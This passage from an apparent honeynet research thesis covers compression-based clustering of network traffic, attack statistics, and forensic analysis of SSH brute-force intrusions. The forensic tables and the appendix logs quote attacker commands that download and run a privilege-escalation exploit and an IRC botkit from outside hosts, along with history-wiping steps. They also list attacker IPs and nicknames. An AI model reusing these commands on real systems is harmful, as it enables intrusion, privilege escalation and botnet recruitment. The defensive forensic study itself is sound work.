(xy ) - min{C (x ),C (y )} max{C (x ),C (y )} NCD is now being used in areas of genome phylogeny, language families, clustering of music, clustering of handwritten digits for OCR, radio observations, malware and internet traffic classification and detection. NID is a normalized representation of the information distance E(x,y). NID is represented as: NID(x , y ) = max{K (x | y ), K (y | x )} max{K (x ), K (y )} Information Distance E(x,y) is “the length of the shortest binary program for the reference universal prefix Turing machine that, with input x computes y, and with input y computes x” [86] is given by the equation: E (x , y ) = max{K (x | y ), K (y | x )} Based on certain features we can see a likeness or dissimilarity among data obtained from different sources. Rudi et al [86] proposed a method to manifest this likeness, using a new similarity metric based on compression. This metric is parameter-free and does not use any features or background knowledge about the data. Thus it can find similarities in feature-based and non-feature based data. This compression based similarity metric was developed as a normalized version of “information metric”. The approach is to find significant similarity between two objects by compressing one, given the information in the other and vice versa. Thus if two pieces are more similar, then we can more succinctly describe one given the other. The mathematics involved is based on Kolmogorov’s complexity theory [85]. Halvar Flake [89] along with Carrera and Erd´elyi [90] have shown comparison of executable objects by implementing graph-based methodologies. Halvar Flake has also applied this methodology to the analysis of malware. The idea is to extract information used by worms. This is done by comparing different versions of the same executable by disassembly of the binary. This approach gives insight into the actual information and 39 flow of the security vulnerability. Wehner [88] discussed a fast method for guessing the family of an observed worm without disassembly. Network traffic characterization has claimed a lot of work. However, very little work has been done utilizing compression based clustering and classification. Wehner [88] utilizes approach [85] to attempt this by compression to determine any similarities. Kulkarni and Bush [91] have attempted similar methods based on Kolmogorov complexity to monitor network traffic. They, however, do not use compression. Work carried out by Evans and Barnett [92] to compare the complexity of legal FTP traffic with illegal traffic, involved compression of sampled benign and attack FTP data from servers. Kulkarni, Evans and Barnett [93] performed denial of service measures using Kolmogorov complexity. This is estimated by computing an estimate of the entropy of 1’s contained in the packet. This is then checked over time using the method of a complexity differential. For our particular case we want to analyse data sets comprising of behavioural profiles of network and system events, for which the number of clusters is not known and the data are not labelled. Hierarchical clustering is fit for any unsupervised method. The relationships are represented in the form of a dendrogram, which is customarily a directed binary tree or undirected ternary tree. To construct the tree from a distance matrix with entries consisting of the pair-wise distances between objects, we utilize the tools provided by author. We made use of the freely available CompLearn toolkit provided by the author [87]. This tool makes use of a heuristic to implement the quartet method. The heuristic is called standardized benefit score S(t). The quartet method proposed by the author is MQTC or minimum quartet tree cost problem, which is a NPhard graph optimization problem. 6.3. Results and Discussion We shall now see how well this technique will help us cluster the profiles that we have obtained. It will be a great achievement if we were able to detect worm like activity or any anomaly based on benign profiles. This will create classifications based on clustering. A prototype of our method is explained here: Proposed Hashed Technique Packets 1 2 3 4 5 6 7 8 1 0 0.464706 0.476744 0.111842 0.184211 0.519737 0.566038 0.526316 2 0.464706 0 0.44186 0.458824 0.470588 0.594118 0.588235 0.6 3 0.476744 0.447674 0 0.47093 0.482558 0.604651 0.30814 0.616279 4 0.105263 0.458824 0.47093 0 0.173333 0.513333 0.559748 0.526667 5 0.177632 0.470588 0.482558 0.173333 0 0.496552 0.578616 0.510345 6 0.526316 0.594118 0.604651 0.526667 0.503448 0 0.408805 0.230159 7 0.578616 0.594118 0.319767 0.572327 0.584906 0.408805 0 0.421384 8 0.526316 0.605882 0.627907 0.526667 0.517241 0.246032 0.427673 0 Table 10: Proposed Hashed Technique IRC Packets HTTP Packets 40 Old Technique (NCD ONLY) Packets 1 2 3 4 5 6 7 8 1 0 0.850746 0.786082 0.440789 0.447368 0.564935 0.83376 0.585526 2 0.849088 0 0.742952 0.845771 0.844113 0.855721 0.771144 0.859038 3 0.783505 0.73466 0 0.775773 0.768041 0.786082 0.099744 0.796392 4 0.440789 0.849088 0.773196 0 0.144068 0.480519 0.815857 0.412214 5 0.447368 0.84743 0.768041 0.144068 0 0.448052 0.815857 0.40458 6 0.571429 0.868988 0.793814 0.480519 0.474026 0 0.734015 0.344156 7 0.828645 0.769486 0.102302 0.815857 0.810742 0.731458 0 0.741688 8 0.592105 0.870647 0.806701 0.419847 0.419847 0.331169 0.744246 0 Table 11: Old Technique (NCD only) The table above shows 8 packets extracted from our Honeynet pcap files. Packets 1-5 being HTTP based traffic packets, and Packets 6-8 being IRC based botnet traffic. Our proposed approach manifests a high similarity amongst packets of HTTP and IRC respectively. HTTP packets have a highest or farthest similarity score of 0.482558 with each other, which can be treated as the upper threshold value. IRC packets have a farthest similarity score of 0.408 with each other. This gives us a general idea of characteristics of traffic that the compressor can see. Analysis of this scheme reveals that compression after hashing the payload is a far better approach than simply hashing the entire payload. As illustrated in the table, the hashed payload has resulted in almost twice more compression as previous technique. This technique can be applied to the work done by Wehner [88] to obtain an even better classification of worms. In her work Wehner [88] has implemented Cilibrasi’s technique [86] of clustering based on Kolmogorov’s complexity [85] for clustering malware. The approach is similar to our work but varies greatly in implementation as we use fuzzy hashing first. It is fruitful but requires more resources depending on the size of the malware being observed. Since we can represent an entire or part of the malware using fuzzy hashing, it is quite possible to achieve better results with less complexity and more robustness. Another promising avenue discovered from this result is classification of traffic based on compression results. When intersected with each other these packets give much higher values than the upper thresholds observed. Packet 3 when compressed with packet 7 is however an exception. Although these packets are very dissimilar and, like others in their group are expected to give a higher or farther similarity score (i.e. greater than 0.5), it is found that they don’t. The resulting value is 0.3, suggesting a very high similarity. This is also visible in the clustering graph shown in the figure below. This leads to the question “Is hashing the entire ASCII payload meeting the expected results?”, “Should we break up the payload and then hash the pieces?”, “How many bytes of the payload should be considered as a standard window size?” This is an interesting research area that we aim to address in future. 41 Figure 10: Clustering by Compression and hashing 42 Chapter 7: Results Figure 11: Honeynet Data Graphical view (ip-port) 7.1. Summary The virtual Honeynet was online for a period of approximately 60 days from 15th September 2008 to 15th November, 2008. During this period we received over 30,000 identifiable attack connections. The attack results were documented as attacked ports and services, Attacker IP’s and Country of Origin. The first attack was documented after 4 days of setting up the Honeynet. After several port scans an attacker attempted a SSH brute force attack from “82.99.xx.xxx”. Geo-location of the IP was retrieved [23] after several hundred attempts the attacker was successful in brute forcing a user account. A botnet client was installed from a free webhosting server and IRC [25] communication was initiated; the chat sessions were translated from Romanian to English using Google Translate service [24]. The tools and chat/commands were retrieved from this session successfully for further forensic analysis. During the project, five similar sophisticated attacks were observed, from which valuable information and tools have been successfully retrieved. Forensic analysis have revealed a depth of information on the attackers, their organization into groups, their ties with each other and some system credentials were logged during the chat exchange. After analysis we came to conclude that attackers originating from Europe are commanding an overly large army of zombie hosts in China and the US to gain access to targets across the globe. Servers are always a high value target for them as they offer a variety of services over stable high speed links. Figure 11 shows a graphical representation of all the Honeynet data in the form of a linked graph. Red nodes represent Source IP’s, Green nodes represent Destination IP’s, Blue nodes are the destination ports and the Yellow node represents the Honeypot. 43 7.2. Attack Statistics Figure 12: Probed Ports 22 43 53 80 12 3 135 137 138 139 443 445 1101 32 83 5353 6666 6667 31337 34405 34611 38852 412 86 42 661 43495 45618 46081 47645 47653 5032 7 532 13 56594 5702 9 60372 We have analysed attacks targeting our Honeynet over a period of 30 days (September 12th to October 12th), and documented them as: Attacked/Probed ports and services Attacker IP's Attackers Country of Origin 7.2.1. Attacked Ports and Services Taking a small sample of attacked ports and services. It has been observed that out of total of 29643 probed ports and services, 29048 were targeted at SSH. This indicates the attackers' focus on brute force means to gain access of the server. This is followed by a high activity on IRC ports indicating botnet activity. 7.2.2. Attacker IP's During its 30 day tenure the Honeypot received 34263 attacks from 615 unique IP's. A 43 great amount of these attacks originated from Europe and China 53 Figure 14: Probed ports (excluding SSH) Figure 13: Top 10 Attackers and Attack Magnitude 80 12 3 135 137 138 139 443 445 1101 32 83 5353 6666 6667 31337 34405 34611 38852 412 86 42 661 43495 45618 46081 47645 47653 5032 7 532 13 56594 5702 9 60372 44 7.2.3. Attacker’s Country of Origin 615 unique attacker IP addresses were identified originating from 79 countries across the globe. Out of these 79 countries the highest number of attacks came from China and Europe followed by the US. This proportion also stands for the highest attack frequencies. Top 50 Attacks by Country - Pie Chart US AU CZ KR UA TW ES NL KR PK CL JO RU NZ RO IR GD DK JP EC 1776 2099 2940 778 1237 978 738 1237 628 307 134 93 93 39 39 24 23 23 19 17 Figure 15: Top 50 Attacks by Country 45 7.3. Forensic Analysis 7.3.1. First Hack September 20th, 2008 INTERPRETATION: The attacker gains access on the system, checks running processes and kills the user cron process. Then after checking users connected to the box the attacker changes the user password. Next he gathers system information and based on the system he downloads his botkit to the /tmp directory. The attacker then runs the botkit and unsets History log environment variables to /dev/null. Finally he loads up his users file and after verifying everything is configured and working well he exits the system. Refer to Appendix B for Sebek and SSH Logs Table 12: Forensics: Hack 7.3.2. Brute Force and Botnets Oct 6th to 8th, 2008 INTERPRETATION [2008-10-17 15:32:57 ]- Unsetting and Deleting History logging: After gaining user shell access on the system, the hacker checks users currently connected on the system and unsets history environment variables and deletes the user .bash_history file. Information Gathering: System information such as system uptime and host information, cpuinfo such as number of processors, instruction set and cache is gained by the hacker. The botkit: After making sure his activities wont be logged and getting system information the attacker downloads his IRC bot in a hidden folder into one of the least used shared system directory /dev/shm. IRC Bots are tools that can control a compromised system remotely via IRC chat channels that the compromised system is set to listen to. Using IRC to control a compromised system is much more covert than using SSH directly, as the attacker does not have to directly log into the system anymore. Further, it allows the attacker to control several such systems, also known as Zombies, at the same time. IRC bots are available freely for legitimate uses of controlling and maintaining IRC channels, however those customized for malicious intent will now be termed as botkits. Table 13: Forensics: Brute Force and Botnets 7.3.3. More Botnets October 18, 2008 92.81.123.209 auth.log.0:Oct 19 07:32:02 paul-desktop sshd[13538]: Accepted password for john from 92.81.123.209 port 54571 ssh2 INTERPRETATION: Most probably the attacker’s ip, as he knew the password directly without any wrong attempts whatsoever. Conclusion: 1. Attackers upload botkits on free webhosting sites as jpegs. The reason being that webhosting companies maybe, do not scan jpeg files, or treat them differently. 2. Its our responsibility to inform these webhosting companies of the illicit content that is being hosted by them and exploited by attackers. 46 Table 14: Forensics: More Botnets 7.3.4. Coordinated Attacks 23rd October, 2008 88.191.98.14 and 91.22.242.105 INTERPRETATION: The attacker brute forced the server using an ssh scanner from 88.191.98.14 and immediately connected to it using 91.22.242.105. After getting shell access as user the attacker checks for current online users and system cpu information. Then he downloads his botkit onto the server. He then extracts, configures and runs the botkit and after verifying everything is running successfully, he deletes the file. This particular hacker however doesnt seem to care too much about clearing up his tracks by deleting history and leaves the history file intact. (rather careless for a skillful hacker) Deutsche Telekom was informed of this attack and necessary logs were provided to block the attacker. Table 15: Forensics: Coordinated Attacks 7.3.5. Local Privilege Escalation attempt 91.22.238.14 24th October, 2008 Sebek Logs: INTERPRETATION The attacker gains access of the system. Determines CPU information. Downloads exploit tools appropriate to the host architecture and OS and attempts to escalate his privileges on the system. This attempt was however not successful. w exit ps x ls cat /proc/cpuinfo exit uname -a sudo su wget ciofu.altervista.org/xpl chmod +x xpl ./xpl w history $ ls Desktop Documents Examples Music Pictures Public Templates Videos xpl john@paul-desktop:~$ ./xpl ----------------------------------Linux vmsplice Local Root Exploit By MarkyZuL ----------------------------------[-] mmap: Permission denied Table 16: Forensics: Local Privilege Escalation attempt 7.3.6. Forensics of an Encrypted Botnet 86.55.235.80 5th and 7th November: /var/log/auth.log:Nov 5 20:01:22 paul-desktop sshd[21290]: Accepted password for john from 86.55.235.80 port 1684 ssh2 /var/log/auth.log:Nov 7 16:38:07 paul-desktop sshd[23247]: Accepted password for john from 86.55.235.80 port 2916 ssh2 [2008-11-05 07:01:32 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#w [2008-11-05 07:01:40 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#uname -a [2008-11-05 07:01:46 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#ps x [2008-11-05 07:01:55 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#ls -a [2008-11-05 07:02:10 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#cat .bash_history [2008-11-05 07:03:17 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#cat /proc/cpuinfo [2008-11-05 07:03:28 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#passwd [2008-11-05 07:06:45 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#cd xpl [2008-11-05 07:07:22 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#chmod +x xpl [2008-11-05 07:09:47 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#./xpl ---------------------------------Linux vmsplice Local Root Exploit By MarkyZuL ----------------------------------- 47 [-] mmap: Permission denied [2008-11-07 03:38:40 Host:130.195.4.20 UID:1001 PID:23251 FD:0 INO:3 COM:bash ]#wget http://www12.asphost4free.com/mrtiger/psybnc-linux.tgz ; tar zxvf psybnc-linux.tgz ; cd psybnc-linux ; cd psybnc ; chmod +x * ; ./psybnc [2008-11-07 03:38:40 Host:130.195.4.20 UID:1001 PID:23251 FD:0 INO:3 COM:bash ]#ls -a INTERPRETATION: The attacker was aware of the password and connected in single attempt. He then downloaded a psy-bnc botkit that listens on port 31337Analysis of the 31337 logs yielded nicks of the attackers “braincode” “impertinent” and “JSP” a simple google search showed a server allowing open directory access which had irc files containing data from these 3 nicks: http://203.188.159.61/cgvak/wq/ which is hosting Australian websites psyBNC is an easy-to-use, multi-user, permanent IRC-Bouncer with many features Analysis of the 31337 logs yielded nicks of the attackers “braincode” “impertinent” and “JSP” a simple google search showed a server allowing open directory access which had irc files containing data from these 3 nicks: http://203.188.159.61/cgvak/wq/ which is hosting Australian websites Table 17: Forensics of Encrypted Botnet 7.3.6.3. Forensics of a Hacker’s IRC session Observations and Comments: After brute forcing into our Linux Honeypot one attacker downloaded his botkit, configured, compiled and executed it, thus adding our Honeypot to his existing botnet chain originating from Netherland(195.47.220.2). The attackers did not encrypt their IRC session as a result we were able to collect and analyze logs from this plain text IRC session. Focusing on a single event we see 4 hackers communicating under the aliases “luv!~bido”,”Dracos!~Volk3R”,”Muzik! Mytzu” and “dog!~dog”. The language used by the attackers was checked using Google translator and it was revealed to be Romanian. The attackers indulged into a very casual and informal conversation. Making fun of each others skills, teasing and abusing each other and in between that exchanging critical information on subnets scanned, vulnerabilities and vulnerable hosts, target ip's and most importantly username and passwords setup on compromised hosts. All this and many more going over the wire in plain text. To our excitement discussing some compromised hosts, hacker “luv!~bido” reveals FTP credentials for a compromised machine in Germany (62.75.252.121). We now had credentials of a machine owned by the hackers themselves. Table 18: Forensic of a hackers IRC session 8. Achievements I have been successful in getting a paper published at the recent Australasian Telecommunications Networks and Applications Conference (ATNAC, 2009), held in Canberra, Australia in November, 2009. I have presented my paper there at Canberra, Australia. I have prepared a Poster on my work. I have setup a virtual Honeynet at Massey University. Collaborated with industry by setting up a Honeynet at a web-hosting company known as Spinning Planet. 48 9. Research Plan 49 References: [1] Spitzner.L (2002). Honeypots: Tracking Hackers. US: Addison Wesley. 1-430.. [2] Stoll, C. The Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer Espionage. Pocket Books, New York, 1990 [3] Cheswick, B. (1991). “An Evening with Berferd, in Which a Cracker Is Lured, Endured, and Studied.” Forum of Incident Response and Security Teams (FIRST). [4] The Honeynet Project http://project.Honeynet.org [5] CERT Advisory CA-2001-31 Buffer Overflow in CDE Subprocess Control Servicehttp://www.cert.org/advisories/CA-2001-31.html [6] Provos, N and Holz, T (July 26, 2007). Virtual Honeypots: From Botnet Tracking to Intrusion Detection. US: Addison-Wesley Professional. [7] Talabis, R. (2005). The Gen II and Gen III Honeynet Architecture. Available: http://www.philippineHoneynet.org/index2.php?option=com_docmanandtask=doc _viewandgid=11andItemid=29. Last accessed June, 2008. [8] William Stallings, “Cryptography and Network Security Principles and Practices”, Third Edition, Prentice Hall, 2003. [9] Security architecture for open systems interconnection for CCITT applications, ITU-T, Study Group VII - Data Communications Networks, 1991 [10] Snort user manual 2.8.3 , www.snort.org [11] Know Your Enemy: Sebek, A kernel based data capture tool, The Honeynet Project, http://www.Honeynet.org, Last Modified: 17 November 2003 [12] Shuja, F. (October, 2006). Virtual Honeynet: Deploying Honeywall using VMware . Available: http://www.Honeynet.pk/Honeywall/index.htm. Last accessed June, 2008. [13] Robert McGrew, Rayford B. Vaughn, JR. Experiences With Honeypot Systems: Development,Deployment, and Analysis. Proceedings of the 39th Hawaii International Conference on System Sciences – 2006. [14] Levine.J, LaBella.R, Owen.H, Contis.D, Culver.B. (2003). The Use of Honeynets to Detect Exploited Systems. Proceedings of the 2003 IEEE. 3 (2), [15] McGrew.R, Rayford B. Vaughn, JR. (2006). Experiences With Honeypot Systems:Development, Deployment, and Analysis. Proceedings of the 39th Hawaii International Conference on System Sciences. [16] Edward, B and Camilo, Viecco. (2005). Towards a Third Generation Data Capture Architecture for Honeynets. Proceedings of the 2005 IEEE, Workshop on Information Assurance and Security, United States Military Academy, West Point, NY. 1 (1), p21-28. [17] Snort, 2006, SNORT - The de facto standard on Intrusion Detection and Prevention, www.Snort.org [18] VMware. (2008). VMware Server 1.0.6 Free. Available: http://www.vmware.com/download/server . Last accessed 20 Aug 2008. [19] VMware. (2006). VMware Server Virtual Machine Guide.Available: http://pubs.vmware.com/server1/wwhelp/wwhimpl/js/html/wwhelp.htm . Last accessed 2 August 2008. 50 [20] “The Honyenet Project, 1999”. [21] Duncan Napier. IPTables/NetFilter – Linux’s next generation stateful packet filter. Sys Admin: The Journal for UNIX Systems Administrators, 10(12):8, 10, 12, 14, 16, December 2001. [22] The Honeynet Project. (2005). Know Your Enemy: Honeywall CDROM Roo. Available: http://old.Honeynet.org/papers/cdrom/Roo/index.html. Last accessed 5 May 2008. [23] V. N. Padmanabban and L. Subramanian. Determining the geographic location of Internet hosts. In SIGMETRICS/Performance, pages 324–325, 2001. [24] Google.com. (2009). Google Translate. Available: http://translate.google.com/ . Last accessed 15 December 2008. [25] J. Oikarinen and D. Reed, “Internet Relay Chat Protocol RFC 1495,” 1993. [26] Paul Barham , Boris Dragovic , Keir Fraser , Steven Hand , Tim Harris , Alex Ho , Rolf Neugebauer , Ian Pratt , Andrew Warfield, Xen and the art of virtualization, Proceedings of the nineteenth ACM symposium on Operating systems principles, October 19-22, 2003, Bolton Landing, NY, USA [27] VirtualBox. (2004). Sun VirtualBox® User Manual. Available: http://www.virtualbox.org/manual/UserManual.html Last accessed 20 July 2008. [28] S. Marcinkowski, Extranets: The Weakest Link and Security, 2001. [29] Arnold, T. (2001). A Method for Securing Credit Card and Private Consumer Data in EBusiness Sites : CyberSource Corporation [30] Defence in Depth: A practical strategy for achieving Information Assurance in today’s highly networked environments [31] S.L. Shaffer and A.R. Simon, "Network," Security, Academic Press, 1994. [32] S.G. Schwartz, Practical Unix and Internet Security, 3rd Editio, O'Reilly Media, Inc, 2003. [33] M. Gasser, Building a secure computer system, 1988. [34] Digital Forensics Research Workshop. “A Road Map for Digital Forensics Research” 2001. www.dfrws.org [35] Caloyannides, Michael A. Computer Forensics and Privacy. Artech House, Inc. 2001. [36] S. Mukkamala and A.H. Sung, "Identifying Significant Features for Network Forensic Analysis Using Artificial Intelligent Techniques," International Journal, vol. 1, 2003, pp. 1-17. [37] S. Hansman and R. Hunt, "A taxonomy of network and computer attacks," Computers and Security, vol. 24, 2005, pp. 31-43. [38] E.D. Security, "A Guide to Cyber Crime Security in 2010," Security, 2009, p. 3. [39] B. Cox, "Dress Your E-Security in Layers," internet.com, 2001, p. 1. [40] Cohen, Frederick B., Protection and Security on the Information Superhighway, John Wiley and Sons, Inc., 1995 [41] P. Innella, "A Brief History of Network Security and the Need for Adherence to the Software Process Model," Information Security, 2008, pp. 1-15 [42] Lipson HF. Tracking and tracing cyber-attacks: technical challenges and global policy issues. Technical report, CERT Coordination Center; November 2002. [43] CERT, "CERT Statistics (Historical)," Incident Reports Received, 2009, p. 1. 51 [44] W. Stallings, "Internet," Security Handbook, IDG Books Worldwide, In, 1995. [45] Alexander, Michael, The Underground Guide to Computer Security, Addison-Wesley Publishing Company, 1996. [46] CERT/CC, "CERT® Advisory CA-2003-04 MS-SQL Server Worm," CERT/CC, Carnegie Mellon University, 2003, p. 1. [47] CERT/CC, "CERT® Advisory CA-2003-20 W32/Blaster worm," CERT/CC, Carnegie Mellon University., 2003, p. 1. [48] CERT-In, "CERT-In Incident Note CIIN-2004-06," CERT-In, 2004, p. 1. [49] Us-cert, "Technical Cyber Security Alert TA09-088A," National Cyber Alert System, 2009, p. 1. [50] P.J. Wade H. Baker Alex Hutton C. David Hylender, Christopher Novak Christopher Porter Bryan Sartin Peter Tippett, M.D., "2009 Data Breach Investigations Report," Business, 2009 [51] J. Northcutt, Stephen Novak, Network Intrusion Detection, New Riders, 2003. [52] C. Kreibich and J. Crowcroft, "Honeycomb - creating intrusion detection signatures using Honeypots," In Proceedings of the 2nd Workshop on Hot Topics in Networks (HotNets-II) HotNets-II, 2003. [53] J. Newsome, B. Karp, and D. Song, "Polygraph: Automatically generating signatures for polymorphic worms," Proc. of the 2005 IEEE Symposium on Security and Privacy, vol. pp, pp. 226-241, May 2005. [54] M.M. Mohammed, H.A. Chan, and N. Ventura, "Honeycyber: automated signature generation for zero-day polymorphic worms," Proc. of the IEEE Military Communications Conference, MILCOM, 2008, pp. 1-6, 2008. [55] H.-A. Kim and B. Karp, "Autograph: Toward automated, distributed worm signature detection," Proc. of 13 USENIX Security Symposium, San Di- ego, CA, Aug., 2004. [56] S. Singh, C. Estan, G. Varghese, and S. Savage, "Automated worm fingerprinting," Proc. Of the 6th conference on Symposium on Operating Systems Design and Implementation (OSDI), Dec, 2004. [57] J. Levine, R.L. Bella, H. Owen, D. Contis, and B. Culver, "The use of Honeynets to detect exploited systems across large enterprise networks," Proc. of 2003 IEEE Workshops on Information Assurance, New York, Jun, 2003, pp. 92-99. [58] Niels Provos. Honeyd - A Virtual Honeypot Daemon. In 10th DFN-CERT Workshop, Hamburg, Germany, February 2003. [59] J. Newsome, B. Karp, and D. Song, "Polygraph: Automatically generating signatures for polymorphic worms," Proc. of the 2005 IEEE Symposium on Security and Privacy, vol. pp, pp. 226-241, May, 2005. [60] Z. Li, M. Sanghi, Y. Chen, M. Kao, and B.C. Hamsa, "Fast Signature Generation for Zero-day Polymorphic Worms with Provable Attack Resilience," Proc. of the IEEE Symposium on Security and Privacy, Oakland, CA, May, 2006. [61] L. Cavallaro, A. Lanzi, L. Mayer, and M. Monga, "LISABETH: Automated Content-Based Signature Generator for Zero-day Polymorphic Worms," Proc. of the fourth international workshop on Software engineering for secure systems, Leipzig, Germany, May, 2008. [62] M.M. Mohammed, H.A. Chan, and N. Ventura, "Honeycyber: automated signature generation for zero-day polymorphic worms," Proc. of the IEEE Military Communications Conference, MILCOM, 2008, pp. 1-6. 52 [63] R.Sommer and V. Paxson. Enhancing byte-level network intrusion detection signatures with context. In 10th ACM Conference on Computer and Communication Security (CCS), Washington, DC, October 2003 [64] R. Agrawal, T. Imielinski, and A. Swami. Mining association rules between sets of items in large databases. In ACM SIGMOD International Conference on Management of Data, 1993. [65] F. Pouget and M. Dacier. Honeypot-based forensics. In AusCERT Asia Pacific Information technology Security Conference 2004 (AusCERT2004), Brisbane, Australia, May 2004. [66] K. Julisch. Clustering intrusion detection alarms to support root cause analysis. ACM Transactions on Information and System Security (TISSEC), 6(4):443–471, November 2003. [67] M. Christodorescu, S. Seshia, S. Jha, D. Song, and R. E. Bryant. Semanticsaware malware detection. In IEEE Symposium on Security and Privacy, Oakland, California, May 2005. [68] J. Jung, V. Paxson, A. W. Berger, and H. Balakrishnan. Fast port-scan detection using sequential hypothesis testing. In IEEE Symposium on Security and Privacy, Oakland, California, May 2004 [69] S. Staniford, J. A. Hoagland, and J. M. McAlerney. Practical automated detection of stealthy portscans. Journal of Computer Security, 10(1/2):105–136, 2002. [70] V. Yegneswaran, J. Giffin, P. Barford, and S. Jha, "An architecture for generating semantics-aware signatures," Proc. of the 14th conference on USENIX Security Symposium, 2005. [71] Yong Tang, Shigang Chen," An Automated Signature-Based Approach against Polymorphic Internet Worms," IEEE Transaction on Parallel and Distributed Systems, pp. 879-892 July 2007. [72] Yi-Min Wang et al, “Automated Web Patrol with Strider HoneyMonkeys: Finding Web Sites That Exploit Browser Vulnerabilities,” Proc. of the 4th ACM SIGPLAN/SIGOPS international conference on Virtual execution environments, pp. 171-180, Seattle, WA, USA, 2008. [73] W. E. Leland, M. S. Taqqu, W. Willinger, and D. V. Wilson, “On the self-similar nature of ethernet traffic (extended version),” IEEE/ACM Trans. Networking, vol. 2, pp. 1–15, Feb. 1994. [74] D.E. Denning and An, "Intrusion," Detection Model, IEEE Transactions on Software Engineering, SE-13, 1987, pp. 222-232. [75] Varun Chandola, Arindam Banerjee, and Vipin Kumar, Anomaly Detection: A Survey, ACM Computing Surveys, Vol. 41(3), Article 15, July 2009 [76] V.V. Phoha, "The Springer Internet Security Dictionary," Springer-Verlag. Phua, C., Alahakoon, D., and Lee, V, vol. 61, 2002, pp. 50-59. [77] Wikipedia, "Behaviour," 2010, p. 1. [78] J.M. Estevez-Tapiador, P. Garcia-Teodoro and J.E. Diaz-Verdejo, “Anomaly detection methods in wired networks: a survey and taxonomy”, Computer Communications 27,pp. 1569-1584, 2004. [79] S.Y. Lim, A. Jones, K. Lumpur, S.R. Centre, and U. Kingdom, "Network Anomaly Detection System: The State of Art of Network Behaviour Analysis," Security, 2008, pp. 459-465. 53 [80] K. Scarfone and P. Mell, Guide to Intrusion Detection and Prevention Systems (IDPS), tech. report 800-94, Nat’l Inst. Standards and Technology , US Dept. of Commerce, 2007. [81] M. Pe, M. Grill, and J. Stiborek, "Adaptive Multiagent System for Network Traffic Monitoring," Intelligent Systems, IEEE, vol. 24, 2009, pp. 16 - 25. [82] F. Clarity, U. Fuzzy, H. Techniques, and I.M. Code, "“FUZZY CLARITY” Using Fuzzy Hashing Techniques to Identify Malicious Code – 1 –," 2007, pp. 1-18. [83] Tridgell, Dr. Andrews. (2003). SpamSum. http://samba.org/ftp/unpacked/junkcode/spamsum/README [84] "Unveiling the Security Illusion: The need for active network forensics," Solera Networks, 2010, p. 11. [85] M. Li and P.M.B. Vit´anyi. An Introduction to Kolmogorov Complexity and its Applications, Springer-Verlag, New York, 2nd Edition, 1997. [86] R. Cilibrasi and P. Vitanyi, "Clustering by compression," IEEE Trans. Information Theory, vol. 51, 2005, p. 4. [87] R. Cilibrasi, The CompLearn Toolkit, 2003, http://complearn.sourceforge.net/. [88] S. Wehner, "Analyzing Worms and Network Traffic using Compression," Work, 2008. [89] H. Flake, "Structural comparison of executable objects," In DIMVA, vol. pages, 2004, pp. 161-173. [90] E. Carrera and F.C. Team, "2. Programming ida pro," 2004, pp. 187-197. [91] A. Kulkarni and S. Bush. Active network management and kolmogorov complexity, 2001. OpenArch 2001, Anchorage Alaska. [92] S. Evans and B. Barnett, "Network Security Through Conservation of Complexity," MILCOM, 2002, 2002. [93] A. Kulkarni, S. Bush, and S. Evans, "Detecting distributed denial-of-service attacks using kolmogorov complexity metrics," 2001. GE CRD Technical Report, 2001. [94] M. Bailey, J. Oberheide, J. Andersen, Z.M. Mao, F. Jahanian, J. Nazario, and A. Networks, "Automated Classification and Analysis of Internet Malware," Electrical Engineering, 2007, pp. 1-18. 54 APPENDICES APPENDIX - A Sebek Logs [2008-09-20 23:01:44 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w [2008-09-20 23:01:48 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#who [2008-09-20 23:02:54 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cat /proc/cpuinfo [2008-09-20 23:02:59 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w [2008-09-20 23:03:07 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ps x [2008-09-20 23:03:14 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#kill -9 10796 [2008-09-20 23:03:15 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w [2008-09-20 23:03:16 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd [2008-09-20 23:03:18 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#passwd [2008-09-20 23:03:36 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#uname -a [2008-09-20 23:04:14 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls[BS][BS][BS]last [2008-09-20 23:04:23 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ps x [2008-09-20 23:04:24 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#history [2008-09-20 23:04:27 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd .tmp [2008-09-20 23:04:28 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls [2008-09-20 23:04:29 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /tmp [2008-09-20 23:04:29 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls [2008-09-20 23:04:32 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /var/tmp [2008-09-20 23:04:32 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls [2008-09-20 23:04:34 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /tmp [2008-09-20 23:04:36 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#wget 